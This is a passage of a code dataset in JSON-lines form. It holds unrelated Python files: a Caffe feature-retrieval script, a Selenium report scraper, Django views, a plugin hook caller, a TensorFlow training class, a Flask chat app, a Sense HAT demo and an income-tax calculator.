'cls_results.txt'\n\ncaffe.set_device(0)\ncaffe.set_mode_gpu()\nnet = caffe.Net('/home/sbokhari/assignment1/py_scripts/train_val_p7.prototxt',\n '/home/sbokhari/assignment1/py_scripts/models/model_p7.caffemodel',\n caffe.TEST)\n\ntest_list = np.loadtxt(test_listfile, 
str, comments=None, delimiter='\\n')\ndata_counts = len(test_list)\nbatch_size = net.blobs['data'].data.shape[0]\nbatch_count = int(np.ceil(data_counts * 1.0 / batch_size))\n\naccuracy = 0\nfnames = []\nlsize = net.blobs['fc7'].data.shape\nwholeset = []\n\nfor i in range(batch_count):\n\n out = net.forward()\n data = net.blobs['fc7'].data\n print(data)\n for j in range(batch_size):\n id = i * batch_size + j\n if id >= data_counts:\n break\n\n fname = test_list[id].split(' ')[0]\n fnames.append(fname)\n\n wholeset.append(np.copy(data[j,:].reshape((1,lsize[1]))))\n\nwholeset = np.concatenate(tuple(wholeset))\n\nfiles = ['NN_1/', 'NN_2/', 'NN_3/']\nimgsIds = choice(len(fnames), len(files))\nimgFeats = wholeset[imgsIds, :]\ndists = cdist(imgFeats, wholeset, 'cosine')\n\nsortids = np.argsort(dists, axis=1)\nsorts = np.sort(dists, axis=1)\n\n\nfor i in range(len(files)):\n print(\"Image {0}: {1}\".format(i+1, fnames[imgsIds[i]]))\n for j in range(11): #sortids[i,0:10]:\n print(\"NN {0} at {2}: {1}\".format(j, fnames[sortids[i,j]], dists[i,int(sortids[i,j])]))\n\n img = Image.open('/scratch/16824/data/crop_imgs/'+fnames[sortids[i,j]])\n img.save(files[i]+'nn'+str(j)+'.jpg')\n","sub_path":"Train/test_cls_orig.py","file_name":"test_cls_orig.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"90673326","text":"import selenium\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.webdriver import Options\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport requests\nimport json\nimport re\nimport pandas as pd\nfrom datetime import datetime\nimport time\n\n# Imports from Will's Previous Work\nfrom robobrowser import RoboBrowser #for navigating and form submission\nimport datetime\nfrom datetime import timedelta, date\nimport time\nimport csv\nimport pandas as pd\nimport MySQLdb\nimport os\n# End of Import Section\n\n# Importing Webdriver_Manager to prevent the need for maintenance.\n# https://github.com/SergeyPirogov/webdriver_manager\n\n\"\"\"\nThis was the original method I was using when developing this script, please run this if you are curious of what is happening under the hood of Selenium or you need to troubleshoot any issues.\n\"\"\"\n# # print(\"Real Browser Launching\")\n# browser = webdriver.Chrome(ChromeDriverManager().install())\n# # print(\"Real Browser has Launched\")\n\n\"\"\"\nThe Headless browsing option greatly reduces the amount of time it takes for the scraper to run.\n\"\"\"\nprint(\"Headless Browser Running\")\noptions = Options()\noptions.add_argument(\"--headless\") # Runs Chrome in headless mode.\noptions.add_argument('--no-sandbox') # Bypass OS security model\noptions.add_argument('--disable-gpu') # applicable to windows os only\noptions.add_argument('start-maximized') # \noptions.add_argument('disable-infobars')\noptions.add_argument(\"--disable-extensions\")\nbrowser = webdriver.Chrome(chrome_options=options, executable_path=ChromeDriverManager().install())\nprint(\"Headless Browser has Launched\")\n\ndef login_into_dash(json_target_file):\n \"\"\"\n Takes the login information from JSON file and passes data to login form.\n\n Parameter json_target_file needs to be equal to the file's location.\n\n Contents of the file must be organized as 
follows [Note: don't forget the curly braces]:\n \n {\n \"username\": \"please-put-your-username-here\",\n \"password\": \"please-put-your-password-here\"\n }\n\n\n \"\"\"\n browser.get(\"http://privdemo.myeldash.com/\")\n with open(json_target_file) as login_data:\n data = json.load(login_data)\n username = data['username']\n password = data['password']\n browser.find_element_by_name(\"ctl00$ContentPlaceHolder1$Username\").send_keys(username)\n browser.find_element_by_name(\"ctl00$ContentPlaceHolder1$Password\").send_keys(password)\n browser.find_element_by_name(\"ctl00$ContentPlaceHolder1$btnLogin\").click()\n\ndef download_excel():\n browser.get(\"http://privdemo.myeldash.com/Reports/AdHoc_View.aspx?id=6\")\n browser.find_element_by_id(\"ContentPlaceHolder1_lnkExport\").click()\n\ndef read_table(url):\n browser.get(url)\n\n # Start of Grabbing Iterator Information\n\n items_and_pages_element = browser.find_element_by_class_name(\"rgInfoPart\").text\n digits_list = []\n pattern = r'[\\d]+[.,\\d]+|[\\d]*[.][\\d]+|[\\d]+'\n if re.search(pattern, items_and_pages_element) is not None:\n for catch in re.finditer(pattern, items_and_pages_element):\n # print(catch[0])\n digits_list.append(catch[0])\n else:\n print(\"Something is broken.\")\n\n # print(digits_list)\n\n items = int(digits_list[0])\n pages = int(digits_list[1])\n print(\"Number of items: \" + str(items))\n print(\"Number of pages: \" + str(pages))\n\n # End of Grabbing Iterator Information\n\n # This block controls table scraping.\n\n table_list = browser.find_elements_by_class_name('rgClipCells')\n\n \n \n # We have to grab table headings from the report.\n # table_headers_table = table_list[0]\n # print(table_headers_table)\n\n # table_headers_table_table_row_element = browser.find_element_by_xpath(\"/html/body/form/div[4]/div[3]/div[6]/div[6]/div[1]/div/table/thead/tr[1]\").get_attribute('outerHTML')\n\n\n table_we_want = table_list[1].get_attribute('outerHTML')\n \n table_we_want = re.sub(r'<\\/span>', 'False', table_we_want)\n table_we_want = re.sub(r'<\\/span>', 'True', table_we_want)\n\n # print(table_we_want)\n\n dataframe = pd.DataFrame()\n\n dataframe = dataframe.append(pd.read_html(table_we_want),ignore_index=True)\n print(len(dataframe.index))\n # print(dataframe)\n # print(len(dataframe.index))\n \n # This is the version that reads the number of items in the page and counts the items until all items have been read from the tables.\n\n while int(len(dataframe.index)) < items:\n browser.find_element_by_css_selector(\"button.t-button.rgActionButton.rgPageNext\").click()\n table_list = browser.find_elements_by_class_name('rgClipCells')\n table_we_want = table_list[1].get_attribute('outerHTML')\n\n # We need to apply the regext statements from earlier to each loop as well.\n\n table_we_want = re.sub(r'<\\/span>?', 'True', table_we_want)\n table_we_want = re.sub(r'<\\/span>?', 'False', table_we_want)\n\n # print(table_we_want)\n dataframe = dataframe.append(pd.read_html(table_we_want),ignore_index=True)\n print(len(dataframe.index))\n time.sleep(5)\n else:\n print(\"We are done scraping.\")\n print(dataframe)\n print(len(dataframe.index))\n\n # page_counter = 0\n # page_limiter = 7\n\n # while page_counter < page_limiter:\n # browser.find_element_by_css_selector(\"button.t-button.rgActionButton.rgPageNext\").click()\n # table_list = browser.find_elements_by_class_name('rgClipCells')\n # table_we_want = table_list[1].get_attribute('outerHTML')\n\n # # We need to apply the regext statements from earlier to each loop as 
well.\n\n # table_we_want = re.sub(r'<\\/span>', 'False', table_we_want)\n # table_we_want = re.sub(r'<\\/span>', 'True', table_we_want)\n\n # # print(table_we_want)\n # dataframe = dataframe.append(pd.read_html(table_we_want),ignore_index=True)\n # print(len(dataframe.index))\n # time.sleep(5)\n # page_counter += 1\n # else:\n # print(\"We are done scraping.\")\n # print(dataframe)\n # print(len(dataframe.index))\n\n\n \"\"\"\n Here we must reorder the columns so our data can be compatible with older DASH Information\n \n The changes we are making:\n - Rearranging the columns to align with the database schema.\n \"\"\"\n\n # dataframe = dataframe[dataframe.columns.drop(\"Project Name\")]\n\n # dataframe.to_csv(\"Export_Before_Builder_Project.csv\", encoding=\"utf-8\", index=False)\n\n # dataframe = dataframe[dataframe.columns.drop(1)]\n\n # dataframe.to_csv(\"Export_After_Builder_Project_col_Drop.csv\", encoding=\"utf-8\", index=False)\n\n dataframe = dataframe[[0,1,2,3,4,5,6,7,8,9,10,11,12]]\n\n # dataframe.to_csv(\"Export_After_Reorganization.csv\", encoding=\"utf-8\", index=False)\n\n # dataframe.to_csv(\"Export.csv\", encoding=\"utf-8\", index=False)\n \n dataframe = dataframe.replace({',': '.'}, regex=True) # remove all commas\n dataframe = dataframe.replace({';': '.'}, regex=True) # remove all semicolons\n dataframe = dataframe.replace({r'\\r': ' '}, regex=True)# remove all returns\n dataframe = dataframe.replace({r'\\n': ' '}, regex=True)# remove all newlines\n\n # Remove the previous \"DASH_Service_TSheets.csv\" file.\n if os.path.exists(\"DASH_Service_TSheets.csv\"):\n os.remove(\"DASH_Service_TSheets.csv\")\n else:\n print(\"We do not have to remove the file.\")\n\n \n dataframe = dataframe.rename(columns={0:\"RatingID\",1:\"Address\",2:\"City\",3:\"State\",4:\"Zip\",5:\"Builder\",6:\"Subdivision\",7:\"Lot\",8:\"ServiceID\",9:\"ServiceType\",10:\"ServiceDate\",11:\"Employee\",12:\"LastUpdated\"})\n\n dataframe['LastUpdated'].astype('datetime64[ns]')\n pd.to_datetime(dataframe['LastUpdated'], utc=False)\n pd.to_datetime(dataframe['ServiceDate'], utc=False)\n\n '''\n List we must match.\n [\"RatingID\",\"Address\",\"City\",\"State\",\"Zip\",\"Builder\",\"Subdivision\",\"Lot\",\"ServiceID\",\"ServiceType\",\"ServiceDate\",\"Employee\",\"LastUpdated\"]\n '''\n\n dataframe.to_csv(\"DASH_Service_TSheets.csv\", index=True)\n\ndef logout_session():\n browser.get(\"http://sem.myirate.com/Dashboard_Company.aspx\")\n browser.find_element_by_xpath('//*[@id=\"navProfile\"]').click()\n try:\n WebDriverWait(browser, 5).until(EC.element_to_be_clickable((By.LINK_TEXT,\"Log Out\"))).click()\n except:\n WebDriverWait(browser, 5).until(EC.element_to_be_clickable((By.LINK_TEXT,\"Log Out\"))).click()\n\ndef main():\n \"\"\"\n Please use these to control the previously defined functions.\n \"\"\"\n login_into_dash(\"./DASHLoginInfo.json\")\n read_table(\"http://sem.myirate.com/Reports/AdHoc_View.aspx?id=1255\")\n logout_session()\n\nmain()\nbrowser.quit()","sub_path":"Archive/DASHNextGen_Service_TSHEETS.py","file_name":"DASHNextGen_Service_TSHEETS.py","file_ext":"py","file_size_in_byte":9021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"223170368","text":"\"\"\" location_selector/views.py\n\n This module implements the view functions for the \"location_selector\"\n application.\n\"\"\"\nimport string\n\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.template import 
RequestContext\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\n\nfrom shared.models import Level, Location\nfrom shared.models import Name, LocationName\nfrom shared.lib import helpers\n\nfrom admin_interface import menus\n\n#############################################################################\n\ndef select_by_level(request, selector_id, level_num):\n \"\"\" Respond to the \"/select_by_level\" URL.\n\n We let the user choose a location with the given level number.\n \"\"\"\n if not request.user.is_authenticated:\n return HttpResponseRedirect(reverse(settings.ADMIN_HOME_VIEW))\n\n if request.method == \"GET\":\n params = request.GET\n elif request.method == \"POST\":\n params = request.POST\n\n if \"location_selector\" not in request.session:\n # Should never happen.\n return HttpResponseRedirect(reverse(settings.ADMIN_HOME_VIEW))\n\n info = request.session['location_selector']['selectors'][int(selector_id)]\n \n menu_heading = info['menu_heading']\n menu_cur_app = info['menu_cur_app']\n menu_cur_view = info['menu_cur_view']\n base_url = info['base_url']\n\n cancel_url = reverse(menu_cur_app + \".views.\" + menu_cur_view)\n\n try:\n level = Level.objects.get(level=level_num)\n except Level.DoesNotExist:\n return HttpResponseRedirect(cancel_url) # Should never happen.\n\n first_letter = params.get('first', \"\")\n if request.method == \"POST\":\n search_text = params.get('search_text', \"\")\n else:\n search_text = \"\"\n\n if search_text != \"\":\n first_letter = \"\"\n\n location_list = Location.objects.filter(level=level)\n if first_letter != \"\":\n location_list = location_list.filter(name__istartswith=first_letter)\n if search_text != \"\":\n location_list = location_list.filter(name__istartswith=search_text)\n\n paginator = Paginator(location_list, 25) # Show 25 locations per page.\n\n page_num = params.get('page', 0)\n\n try:\n page = paginator.page(page_num)\n except (PageNotAnInteger, EmptyPage):\n # Invalid page -> show the first page.\n page = paginator.page(1)\n\n filterOptions = []\n filterOptions.append({'value' : \"\",\n 'label' : \"All\"})\n for letter in string.uppercase:\n filterOptions.append({'value' : letter,\n 'label' : letter})\n\n menu_html = menus.generate(request, menu_heading,\n menu_cur_app, menu_cur_view)\n\n return render_to_response(\"location_selector/templates/\" +\n \"select_by_level.html\",\n {'menu_html' : menu_html,\n 'level' : level,\n 'first' : first_letter,\n 'page' : page,\n 'filter_options' : filterOptions,\n 'search_text' : search_text,\n 'base_url' : base_url,\n 'cancel_url' : cancel_url,\n },\n context_instance=RequestContext(request))\n\n#############################################################################\n\ndef search(request, selector_id):\n \"\"\" Respond to the \"/search\" URL.\n\n We perform searches by location code or location name.\n \"\"\"\n if not request.user.is_authenticated:\n return HttpResponseRedirect(reverse(settings.ADMIN_HOME_VIEW))\n\n if request.method == \"GET\":\n params = request.GET\n elif request.method == \"POST\":\n params = request.POST\n\n if \"location_selector\" not in request.session:\n # Should never happen.\n return HttpResponseRedirect(reverse(settings.ADMIN_HOME_VIEW))\n\n info = request.session['location_selector']['selectors'][int(selector_id)]\n \n menu_heading = info['menu_heading']\n menu_cur_app = info['menu_cur_app']\n menu_cur_view = info['menu_cur_view']\n base_url = 
info['base_url']\n\n cancel_url = reverse(menu_cur_app + \".views.\" + menu_cur_view)\n\n if params.get(\"back\") != None:\n # The user clicked on our \"Back\" button -> redisplay the view\n # containing the location selector.\n return HttpResponseRedirect(cancel_url)\n\n if params.get(\"loc_code\") not in [None, \"\"]:\n # The user entered a location code. Attempt to search against this\n # code.\n loc_code = params['loc_code']\n\n try:\n location = Location.objects.get(code=loc_code)\n except Location.DoesNotExist:\n location = None\n\n if location != None:\n return HttpResponseRedirect(base_url + loc_code)\n else:\n menu_html = menus.generate(request, menu_heading,\n menu_cur_app, menu_cur_view)\n\n err_msg = \"There is no location with the code '\" + loc_code + \"'\"\n\n return render_to_response(\"search_error.html\",\n {'menu_html' : menu_html,\n 'err_msg' : err_msg,\n 'cancel_url' : cancel_url},\n context_instance=RequestContext(request))\n\n if params.get(\"loc_name\") not in [None, \"\"]:\n # The user entered a location name. Attempt to search against this\n # name.\n name = helpers.tidy_name(params['loc_name'])\n\n locations = []\n for nameRecord in Name.objects.filter(name=name.upper()):\n for loc_name in LocationName.objects.filter(name=nameRecord):\n loc = loc_name.location\n if loc not in locations:\n locations.append(loc)\n\n if len(locations) == 0:\n # Tell the user the bad news.\n menu_html = menus.generate(request, menu_heading,\n menu_cur_app, menu_cur_view)\n\n err_msg = \"There are no locations with the name '\" + name + \"'\"\n\n return render_to_response(\"search_error.html\",\n {'menu_html' : menu_html,\n 'err_msg' : err_msg,\n 'cancel_url' : cancel_url},\n context_instance=RequestContext(request))\n else:\n menu_html = menus.generate(request, menu_heading,\n menu_cur_app, menu_cur_view)\n return render_to_response(\"search_results.html\",\n {'menu_html' : menu_html,\n 'name' : name,\n 'locations' : locations,\n 'base_url' : base_url},\n context_instance=RequestContext(request))\n\n","sub_path":"apps/location_selector/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"243290884","text":"import asyncio\nimport weakref\n\nimport sys\n\nfrom .hooks import HookSpec\nfrom .helpers import Result\n\n\ndef _priority_groups(hookimpls):\n result = [[], [], []]\n for h in hookimpls:\n if h.is_try_first:\n result[0].append(h)\n elif not h.is_try_last:\n result[1].append(h)\n else:\n result[2].append(h)\n return result\n\n\nclass HookCaller(object):\n def __init__(self, name, plugin_manager):\n self.name = name\n \"\"\":type: str\"\"\"\n self._plugin_manager = weakref.ref(plugin_manager)\n self.before = []\n \"\"\":type: list[aiopluggy.hooks.HookImpl]\"\"\"\n self.functions = []\n \"\"\":type: list[aiopluggy.hooks.HookImpl]\"\"\"\n self.spec = None\n \"\"\":type: aiopluggy.hooks.HookSpec\"\"\"\n\n @property\n def plugin_manager(self):\n \"\"\":rtype: aiopluggy.PluginManager\"\"\"\n return self._plugin_manager()\n\n def set_spec(self, namespace, flag_set):\n assert self.spec is None\n self.spec = HookSpec(namespace, self.name, flag_set)\n for hookimpl in (self.before + self.functions):\n hookimpl.validate_against(self.spec)\n\n def add_hookimpl(self, hookimpl):\n \"\"\"A an implementation to the callback chain.\n \"\"\"\n if self.spec:\n hookimpl.validate_against(self.spec)\n\n if hookimpl.is_before:\n methods = self.before\n else:\n methods = 
self.functions\n\n        if hookimpl.is_try_last:\n            methods.insert(0, hookimpl)\n        elif hookimpl.is_try_first:\n            methods.append(hookimpl)\n        else:\n            # find last non-try_first method\n            i = len(methods) - 1\n            while i >= 0 and methods[i].is_try_first:\n                i -= 1\n            methods.insert(i + 1, hookimpl)\n\n    def __repr__(self):\n        return \"<HookCaller %r>\" % (self.name,)\n\n    def __call__(self, *args, **kwargs):\n        if args:\n            raise TypeError(\"hook calling supports only keyword arguments\")\n        spec = self.spec\n        if spec is None:\n            return self._multicall_sync(\n                caller_kwargs=kwargs\n            )\n        notinspec = set(kwargs.keys()) - spec.req_args - set(spec.opt_args.keys())\n        if notinspec:\n            raise TypeError(\n                # TODO: show spec signature\n                \"Argument(s) %s not declared in hookspec\" % (notinspec,),\n            )\n        notincall = spec.req_args - set(kwargs.keys())\n        if notincall:\n            raise TypeError(\n                # TODO: show spec signature\n                \"Missing required argument(s): %s\" % (notincall,)\n            )\n        if spec.is_replay:\n            self.plugin_manager.history.append((self.name, kwargs))\n        if spec.is_first_notnone or spec.is_first_only:\n            return self._multicall_first_sync(kwargs, spec.is_first_only) \\\n                if spec.is_sync \\\n                else self._multicall_first_async(kwargs, spec.is_first_only)\n        return self._multicall_sync(kwargs) \\\n            if spec.is_sync \\\n            else self._multicall_async(kwargs)\n\n    def replay(self, function_, kwargs):\n        return self._multicall_first_sync(\n            kwargs, first_only=True, functions=[function_]\n        )\n\n    async def _call_befores(self, caller_kwargs):\n        async def call_befores(hookimpl_group):\n            awaitables = []\n            # noinspection PyBroadException\n            try: # <-- to cancel any unfinished awaitables\n                for hookimpl in reversed(hookimpl_group):\n                    kwargs = hookimpl.filtered_args(caller_kwargs)\n                    if hookimpl.is_async:\n                        awaitables.append(asyncio.ensure_future(\n                            hookimpl.function(**kwargs)\n                        ))\n                    else:\n                        hookimpl.function(**kwargs)\n                if len(awaitables) > 0:\n                    for f in asyncio.as_completed(awaitables):\n                        await f\n            except Exception:\n                for a in awaitables:\n                    if not a.done():\n                        a.cancel()\n                raise\n\n        for group in _priority_groups(self.before):\n            await call_befores(group)\n\n    def _call_befores_sync(self, caller_kwargs):\n        # noinspection PyBroadException\n        for hookimpl in reversed(self.before):\n            kwargs = hookimpl.filtered_args(caller_kwargs)\n            hookimpl.function(**kwargs)\n\n    async def _multicall_async(self, caller_kwargs, functions=None):\n        \"\"\"Execute a call into multiple python methods.\n\n        ``caller_kwargs`` comes from HookCaller.__call__().\n\n        \"\"\"\n        # __tracebackhide__ = True\n        if functions is None:\n            functions = self.functions\n        await self.plugin_manager.await_unscheduled_coros()\n        await self._call_befores(caller_kwargs=caller_kwargs)\n        retval = []\n\n        async def multicall_parallel(hookimpl_group):\n            awaitables = []\n            # noinspection PyBroadException\n            try: # <-- to cancel any unfinished awaitables\n                for hookimpl in reversed(hookimpl_group):\n                    kwargs = hookimpl.filtered_args(caller_kwargs)\n                    if hookimpl.is_async:\n                        awaitables.append(hookimpl.function(**kwargs))\n                    else:\n                        # noinspection PyBroadException\n                        try:\n                            retval.append(Result(hookimpl.function(**kwargs)))\n                        except Exception:\n                            retval.append(Result(exc_info=sys.exc_info()))\n            except Exception:\n                for a in awaitables:\n                    asyncio.ensure_future(a).cancel()\n                raise\n            if len(awaitables) > 0:\n                for f in asyncio.as_completed(awaitables):\n                    # noinspection PyBroadException\n                    try:\n                        retval.append(Result(await f))\n                    except Exception:\n                        retval.append(Result(exc_info=sys.exc_info()))\n\n        for group in _priority_groups(functions):\n            await 
multicall_parallel(group)\n        return retval\n\n    def _multicall_sync(self, caller_kwargs, functions=None):\n        \"\"\"Execute a call into multiple python methods.\n\n        Called from :func:`HookCaller.__call__`.\n\n        \"\"\"\n        # __tracebackhide__ = True\n        if functions is None:\n            functions = self.functions\n        self._call_befores_sync(caller_kwargs=caller_kwargs)\n        retval = []\n        for hookimpl in reversed(functions):\n            kwargs = hookimpl.filtered_args(caller_kwargs)\n            # noinspection PyBroadException\n            try:\n                retval.append(Result(hookimpl.function(**kwargs)))\n            except Exception:\n                retval.append(Result(exc_info=sys.exc_info()))\n        return retval\n\n    async def _multicall_first_async(self, caller_kwargs, first_only, functions=None):\n        \"\"\"Execute a call into multiple python methods.\n\n        ``caller_kwargs`` comes from HookCaller.__call__().\n\n        \"\"\"\n        # __tracebackhide__ = True\n        if functions is None:\n            functions = self.functions\n        await self.plugin_manager.await_unscheduled_coros()\n        await self._call_befores(caller_kwargs=caller_kwargs)\n        for hookimpl in reversed(functions):\n            kwargs = hookimpl.filtered_args(caller_kwargs)\n            # noinspection PyBroadException\n            result = hookimpl.function(**kwargs)\n            if hookimpl.is_async:\n                result = await result\n            if first_only or result is not None:\n                return result\n        return None\n\n    def _multicall_first_sync(self, caller_kwargs, first_only, functions=None):\n        \"\"\"Execute a call into multiple python methods.\n\n        Called from :func:`HookCaller.__call__`.\n\n        \"\"\"\n        # __tracebackhide__ = True\n        if functions is None:\n            functions = self.functions\n        self._call_befores_sync(caller_kwargs=caller_kwargs)\n        for hookimpl in reversed(functions):\n            kwargs = hookimpl.filtered_args(caller_kwargs)\n            result = hookimpl.function(**kwargs)\n            if first_only or result is not None:\n                return result\n        return None\n","sub_path":"aiopluggy/hook_caller.py","file_name":"hook_caller.py","file_ext":"py","file_size_in_byte":8434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"599214584","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\nimport numpy as np\n\nimport sys\nsys.path.append(\"../base\")\nfrom base_func import Batch,Loss,Accuracy,Optimization\n\nclass Model(object):\n    def __init__(self,name):\n        self.name = name\n        self.momentum = 0.5\n        self.output_act_func='softmax'\n        self.loss_func='mse'\n        self.bp_algorithm = 'sgd'\n        self.best_average_acc = 0\n        self.pt_model = None\n        self.loss = None\n        self.accuracy = None\n        self.train_batch = None\n        self.merge = None\n    \n    def build_train_step(self):\n        # Loss\n        if self.loss is None:\n            _loss=Loss(label_data=self.label_data,\n                       pred=self.pred,\n                       output_act_func=self.output_act_func)\n            self.loss = _loss.get_loss_func(self.loss_func) # + 0.5*tf.matrix_determinant(tf.matmul(self.out_W,tf.transpose(self.out_W)))\n        # Accuracy\n        if self.accuracy is None:\n            \n            _ac=Accuracy(label_data=self.label_data,\n                         pred=self.pred)\n            self.accuracy=_ac.accuracy()\n        \n        # Build the training step\n        if self.train_batch is None:\n            if self.bp_algorithm=='adam' or self.bp_algorithm=='rmsp': \n                self.global_step = None\n                self.r = self.lr\n            else: \n                self.global_step = tf.Variable(0, trainable=False) # minimize() increments global_step by 1 on each call\n                self.r = tf.train.exponential_decay(learning_rate=self.lr, global_step=self.global_step, decay_steps=100, decay_rate=0.96, staircase=True)\n            \n            self._optimization=Optimization(r=self.r,momentum=self.momentum)\n            self.train_batch=self._optimization.trainer(algorithm=self.bp_algorithm).minimize(self.loss,global_step=self.global_step)\n        
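# NOTE: with the exponential decay above, the sgd-style learning rate is\n        # lr * 0.96 ** floor(global_step / 100).\n        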
\n    def train_model(self,train_X,train_Y=None,val_X=None,val_Y=None,sess=None,summ=None,load_saver=''):\n        pt_save_path='../saver/'+self.name+'/pre-train.ckpt'\n        ft_save_path='../saver/'+self.name+'/fine-tune.ckpt'\n        saver = tf.train.Saver()\n        if load_saver=='load_f':\n            # Load the fine-tuned model\n            print(\"Load Fine-tuned model...\")\n            saver.restore(sess,ft_save_path)\n            return\n        elif load_saver=='load_p':\n            # Load the pre-trained model\n            print(\"Load Pre-trained model...\")\n            saver.restore(sess,pt_save_path)\n        elif self.pt_model is not None:\n            # Start pre-training\n            print(\"Start Pre-training...\")\n            self.pt_model.train_model(train_X=train_X,sess=sess,summ=summ)\n            print(\"Save Pre-trained model...\")\n            saver.save(sess,pt_save_path)\n        # Start fine-tuning\n        print(\"Start Fine-tuning...\")\n        _data=Batch(images=train_X,\n                    labels=train_Y,\n                    batch_size=self.batch_size)\n        n=train_X.shape[0]\n        m=int(n/self.batch_size)\n        mod=max(int(self.epochs*m/1000),1)\n        \n        # Iteration counter\n        k=0\n        for i in range(self.epochs):\n            sum_loss = 0\n            sum_acc = 0\n            for _ in range(m): \n                k=k+1\n                batch_x, batch_y= _data.next_batch()\n                # batch_x, batch_y= batch_x[:int(self.batch_size/4),:], batch_y[:int(self.batch_size/4),:]\n                summary,loss,acc,_=sess.run([self.merge,self.loss,self.accuracy,self.train_batch],feed_dict={\n                        self.input_data: batch_x,\n                        self.label_data: batch_y,\n                        self.keep_prob: 1-self.dropout})\n                #**************** Write summary ******************\n                if k%mod==0: summ.train_writer.add_summary(summary, k)\n                #*************************************************\n                sum_loss =sum_loss+loss\n                sum_acc = sum_acc + acc\n            loss = sum_loss/m\n            acc = sum_acc/m\n            print('>>> epoch = {} , loss = {:.4} , accuracy = {:.4}'.format(i+1,loss,acc))\n            if val_X is not None:\n                self.validation_model(val_X,val_Y,sess)\n        \n        print(\"Save model...\")\n        saver.save(sess,ft_save_path)\n    \n    def unsupervised_train_model(self,train_X,sess,summ):\n        _data=Batch(images=train_X,\n                    labels=None,\n                    batch_size=self.batch_size)\n        n=train_X.shape[0]\n        m=int(n/self.batch_size)\n        mod=max(int(self.epochs*m/1000),1)\n        \n        # Iteration counter\n        k=0\n        for i in range(self.epochs):\n            sum_loss = 0\n            for _ in range(m):\n                k=k+1\n                batch_x = _data.next_batch()\n                summary,loss,_=sess.run([self.merge,self.loss,self.train_batch],feed_dict={\n                        self.input_data: batch_x,\n                        self.label_data: batch_x})\n                #**************** Write summary ******************\n                if k%mod==0: summ.train_writer.add_summary(summary, k)\n                #*************************************************\n                sum_loss =sum_loss+loss\n            loss = sum_loss/m\n            print('>>> epoch = {} , loss = {:.4}'.format(i+1,loss))\n    \n    def test_model(self,test_X,test_Y,sess):\n        if self.use_for=='classification':\n            acc,pred_y=sess.run([self.accuracy,self.pred],feed_dict={\n                    self.input_data: test_X,\n                    self.label_data: test_Y,\n                    self.keep_prob: 1.0})\n            print('[Accuracy]: %f' % acc)\n            return acc,pred_y\n        else:\n            mse,pred_y=sess.run([self.loss,self.pred],feed_dict={\n                    self.input_data: test_X,\n                    self.label_data: test_Y,\n                    self.keep_prob: 1.0})\n            print('[MSE]: %f' % mse)\n            return mse,pred_y\n    \n    def validation_model(self,val_X,val_Y,sess):\n        if type(val_X)==list:\n            n_class = len(val_X)\n            acc=np.zeros(n_class)\n            for i in range(n_class):\n                if i==3 or i==9 or i==15: continue\n                acc[i]=sess.run(self.accuracy,feed_dict={\n                        self.input_data: val_X[i],\n                        self.label_data: val_Y[i],\n                        self.keep_prob: 1.0})\n            average_acc = np.sum(acc)/19\n            print('   >>> validation accuracy = {:.4}'.format(average_acc))\n            if average_acc > self.best_average_acc:\n                self.best_average_acc = average_acc\n                self.best_acc_array = 
acc","sub_path":"models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"608661122","text":"from markupsafe import escape\nfrom flask import Flask, url_for, render_template, request\nimport sqlite3\napp = Flask(__name__)\n\n@app.route('/')\ndef main(chat_alldata=None):\n con = sqlite3.connect('chat.db')\n cur = con.cursor()\n\n if 'name' in request.args and request.args['name'] != \"\":\n cur.execute(\"select * from chat where name=? \", (request.args['name'],))\n print(\"true\")\n else:\n cur.execute(\"select * from chat \")\n print(\"false\")\n\n chat_alldata = cur.fetchall()\n con.close()\n print(\"chat_alldataは\", chat_alldata, \"です。\")\n return render_template('chat.html', chat_alldata=chat_alldata)\n\n@app.route('/submit',methods=['POST']) \ndef submit():\n con = sqlite3.connect('chat.db')\n cur = con.cursor()\n cur.execute(\"insert into chat values (?, ?)\", (request.form[\"chat_name\"] , request.form[\"chat_text\"]))\n con.commit()\n con.close()\n return \"%s, %s\" % (request.form[\"chat_name\"],request.form[\"chat_text\"])","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"541205506","text":"# File: 01_hello.py\n# Author: Raphael Holzer\n# Date: 26. 11. 2018\n\n# from import \nfrom sense_hat import SenseHat\n\n# create a new SenseHat object\nsense = SenseHat()\nsense.set_rotation(180)\nred = (255, 0, 0)\n\n# infinite loop\nwhile True:\n # use the method 'show_message'\n sense.show_message('Bonjour, ici la Terre!', scroll_speed = 0.1, text_colour = red)\n","sub_path":"sensehat/01_hello.py","file_name":"01_hello.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"554839621","text":"def ver_aliquota(salario):\n if salario <= 1903.98:\n aliquota = 0\n elif salario >= 1903.99 and salario <= 2826.65:\n aliquota = 0.075\n elif salario >= 2826.65 and salario <= 3751.06:\n aliquota = 0.15\n elif salario >= 3751.06 and salario <= 4664.68:\n aliquota = 0.225\n else:\n aliquota = 0.275\n\n return aliquota\n\ndef print_alinhado(a, b, c, d):\n print('{:<8} {:<10} {:<10} {:<6}'.format(a, b, c, d))\n\nnome = input(\"Nome: \")\nsalario = float(input(\"Salário: \"))\naliquota = ver_aliquota(salario)\nir = salario * aliquota\n\nprint_alinhado('Nome', 'Salário', 'Alíquota', 'IR')\nprint_alinhado(nome, salario, aliquota, 